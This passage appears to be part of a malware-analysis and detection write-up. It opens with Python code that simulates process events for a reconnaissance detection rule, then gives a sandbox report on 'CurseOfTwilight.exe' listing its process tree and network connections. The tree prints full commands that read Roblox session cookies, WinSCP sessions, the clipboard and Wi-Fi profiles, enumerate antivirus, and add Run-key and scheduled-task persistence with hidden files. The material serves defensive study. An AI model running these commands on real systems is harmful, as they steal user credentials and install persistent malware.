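        ev.append(ProcEvent(t, pid, 4840, cmd, f'{cmd} /d /s /c "{inner}"'))
        ev.append(ProcEvent(t + 0.1, pid + 1, pid, child_image, child_cmd))
        pid, t = pid + 2, t + step
    for _ in range(30):  # the tasklist polling loop, one spawn every two seconds
        wrapped("tasklist", tasklist, "tasklist", step=2.0)
    wrapped("net session", r"C:\Windows\system32\net.exe", "net session")
    wrapped("wmic csproduct get uuid", wmic, "wmic csproduct get uuid")
    ps = (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
          r"\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault")
    wrapped(ps, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ps)
    query = reg + r' QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"'
    wrapped(query, reg, query)
    add = (reg + r' ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ'
           r' /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe" /f')
    wrapped(add, reg, add)  # assumed reg.exe command line behind the Run value shown in the report
    ev.append(ProcEvent(5.0, 9000, 1200, cmd, f"{cmd} /c tasklist"))  # benign control: one interactive tasklist
    ev.append(ProcEvent(5.1, 9001, 9000, tasklist, "tasklist"))
    return ev
```

The thresholds (ten tasklist.exe spawns inside sixty seconds, three reconnaissance categories) are assumptions to tune against your own baseline; the ninety-odd tasklist.exe spawns listed in this detonation clear them by a wide margin, while the single interactive `tasklist` in the control tree scores "none". Attribution walks through cmd.exe and net.exe only, so a child of an unexpected intermediary (a dropped batch file, for instance) would surface as its own origin rather than being folded into the parent.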
Processes
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=2148 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4840 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
(the two lines above repeat 92 times in succession at this point in the tree, one pair per spawn; identical consecutive entries collapsed)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\tasklist.exe
tasklist
(the two lines above repeat 65 times in succession at this point in the tree, one pair per spawn; identical consecutive entries collapsed)
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\net.exe
net session
C:\Windows\system32\tasklist.exe
tasklist
(the two lines above repeat 25 times in succession at this point in the tree, one pair per spawn; identical consecutive entries collapsed)
C:\Windows\system32\more.com
more +1
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4840 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\kbuL5EmJfXIQ_tezmp.ps1"
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\RGyqVfeN3YcR.vbs
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function Get-AntiVirusProduct {
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest"
C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupP0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe /f
C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn WindowsDriverSetupP0HaCU /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\" /F /rl highest
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\"""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CurseOfTwilight.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\CurseOfTwilight.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_P0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs\"""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_P0HaCU /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_P0HaCU.vbs
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2628 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nova-sentinel.com | udp |
| GB | 89.213.140.116:443 | nova-sentinel.com | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 116.140.213.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store3.gofile.io | udp |
| US | 136.175.10.233:443 | store3.gofile.io | tcp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
